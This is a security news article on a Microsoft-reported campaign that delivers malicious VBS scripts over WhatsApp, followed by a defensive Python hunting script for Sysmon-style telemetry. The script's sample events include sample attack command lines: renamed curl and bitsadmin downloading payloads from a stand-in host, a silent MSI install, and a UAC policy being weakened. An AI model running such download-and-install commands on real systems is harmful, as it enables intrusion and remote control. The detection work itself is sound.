
Microsoft is drawing attention to a new campaign that has leveraged WhatsApp messages to distribute malicious Visual Basic Script (VBS) files.
The activity, which began in late February 2026, uses these scripts to initiate a multi-stage infection chain for establishing persistence and enabling remote access. It is currently not known what lures the threat actors use to trick users into executing the scripts.
"The campaign relies on a combination of social engineering and living-off-the-land techniques," the Microsoft Defender Security Research Team said. "It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system."
The use of legitimate tools and trusted platforms is a deadly combination, as it allows threat actors to blend into normal network activity and increase the likelihood that their attacks succeed.
The activity begins with the attackers distributing malicious VBS files via WhatsApp messages that, when executed, create hidden folders in "C:\ProgramData" and drop renamed copies of legitimate Windows utilities such as "curl.exe" (renamed as "netapi.dll") and "bitsadmin.exe" (renamed as "sc.exe").

After gaining an initial foothold, the attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. This is achieved by downloading auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.
"Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses," Redmond said. "It repeatedly attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\Software\Microsoft\Win, and embedding persistence mechanisms to ensure the infection survives system reboots."
These actions allow the threat actors to gain elevated privileges without user interaction via a combination of Registry manipulation and UAC bypass techniques, and ultimately deploy unsigned MSI installers. These include legitimate tools like AnyDesk that provide attackers with persistent remote access, enabling them to exfiltrate data or deploy additional malware.
"This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting," Microsoft said.
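Each stage of the chain described above leaves a host-telemetry footprint that a defender can hunt for. The script below is an added example, not Microsoft's detection logic and not code from the campaign: it runs a handful of rules over Sysmon-style event records (ID 1 process creation, ID 11 file create, ID 13 registry value set) and flags a watched utility whose PE OriginalFileName disagrees with the name it runs under (curl.exe as netapi.dll, bitsadmin.exe as sc.exe), payloads staged under ProgramData, msiexec installing a package from ProgramData, UAC policy values being rewritten, and a burst of UAC prompts. The sample records are constructed, with every path, GUID and URL invented; the full UAC policy key and the consent.exe burst heuristic are this example's assumptions, since the article only quotes a truncated registry path.

```python
"""Hunting rules for the WhatsApp-delivered VBS infection chain.

Added example: not Microsoft's detection logic and free of campaign artefacts.
Evaluates rules over Sysmon-style event records (ID 1 process creation,
ID 11 file create, ID 13 registry value set).  SAMPLE_EVENTS is constructed
for illustration; every path, GUID and URL in it is invented.
"""
import ntpath
from datetime import datetime, timedelta

# Utilities the article says were dropped under other file names.
WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe"}

# The article quotes a truncated registry path ("HKLM\Software\Microsoft\Win").
# The key below is the real location of the UAC policy values; treating it as
# the tampering target is an assumption of this example.
UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {"EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop"}

# Every UAC prompt spawns consent.exe; a burst of them looks like a retry loop.
PROMPT_BURST = 3
PROMPT_WINDOW = timedelta(seconds=60)


def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def _under_programdata(path):
    return path.lower().startswith("c:\\programdata\\")


def hunt(events):
    """Return a list of (rule, detail) findings for the given event records."""
    findings = []
    prompt_times = []
    for ev in events:
        if ev["id"] == 1:
            image = ev["Image"]
            base = ntpath.basename(image).lower()
            original = ev.get("OriginalFileName", "").lower()
            cmdline = ev.get("CommandLine", "").lower()
            # Rule 1: renaming a PE does not change its version resource, so a
            # watched OriginalFileName that differs from the on-disk name stands out.
            if original in WATCHED_ORIGINALS and original != base:
                findings.append(("renamed_utility", f"{original} running as {image}"))
            # Rule 2: msiexec installing a package staged under ProgramData.
            if base == "msiexec.exe" and "programdata" in cmdline and ".msi" in cmdline:
                findings.append(("msi_from_programdata", ev["CommandLine"]))
            if base == "consent.exe":
                prompt_times.append(_ts(ev))
        elif ev["id"] == 11:
            # Rule 3: a script or installer written into ProgramData by a
            # process that itself lives in ProgramData.
            target = ev["TargetFilename"]
            if (_under_programdata(target) and _under_programdata(ev["Image"])
                    and target.lower().endswith((".vbs", ".msi"))):
                findings.append(("staged_payload", target))
        elif ev["id"] == 13:
            # Rule 4: a UAC policy value being rewritten.
            key, _, value = ev["TargetObject"].rpartition("\\")
            if key.lower() == UAC_KEY.lower() and value in UAC_VALUES:
                findings.append(("uac_tamper", f"{value} -> {ev.get('Details')}"))
    # Rule 5: PROMPT_BURST or more UAC prompts inside one PROMPT_WINDOW.
    prompt_times.sort()
    for i in range(len(prompt_times) - PROMPT_BURST + 1):
        if prompt_times[i + PROMPT_BURST - 1] - prompt_times[i] <= PROMPT_WINDOW:
            findings.append(("uac_prompt_burst", f"{PROMPT_BURST}+ prompts within {PROMPT_WINDOW}"))
            break
    return findings


SAMPLE_EVENTS = [  # constructed Sysmon-style records, not real telemetry
    {"id": 1, "UtcTime": "2026-03-02 09:15:01.000",
     "Image": r"C:\ProgramData\.svc\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.svc\stage2.vbs https://payload-host.invalid/stage2.vbs"},
    {"id": 11, "UtcTime": "2026-03-02 09:15:02.000",
     "Image": r"C:\ProgramData\.svc\netapi.dll", "TargetFilename": r"C:\ProgramData\.svc\stage2.vbs"},
    {"id": 1, "UtcTime": "2026-03-02 09:15:03.000",
     "Image": r"C:\ProgramData\.svc\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"sc.exe /transfer job https://payload-host.invalid/rat.msi C:\ProgramData\.svc\rat.msi"},
    {"id": 1, "UtcTime": "2026-03-02 09:15:04.000",  # benign: the genuine sc.exe
     "Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe", "CommandLine": "sc.exe query"},
    *[{"id": 1, "UtcTime": "2026-03-02 09:15:%02d.000" % (10 + 5 * i),
       "Image": r"C:\Windows\System32\consent.exe", "OriginalFileName": "consent.exe",
       "CommandLine": "consent.exe 1234 280 000001F2"} for i in range(3)],
    {"id": 13, "UtcTime": "2026-03-02 09:15:30.000", "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": UAC_KEY + r"\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000000)"},
    {"id": 1, "UtcTime": "2026-03-02 09:15:31.000",
     "Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\.svc\rat.msi /qn"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:22} {detail}")
```

Run against the sample batch, the script reports both renamed utilities, the staged stage2.vbs, the UAC value rewrite, the msiexec install from ProgramData and the prompt burst, while the genuine sc.exe stays silent because its OriginalFileName matches its file name. Rule 1 is the most portable of the five: it needs only the OriginalFileName field that Sysmon and most EDR agents already record, and it catches any renamed copy of the watched utilities regardless of the folder it lands in.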

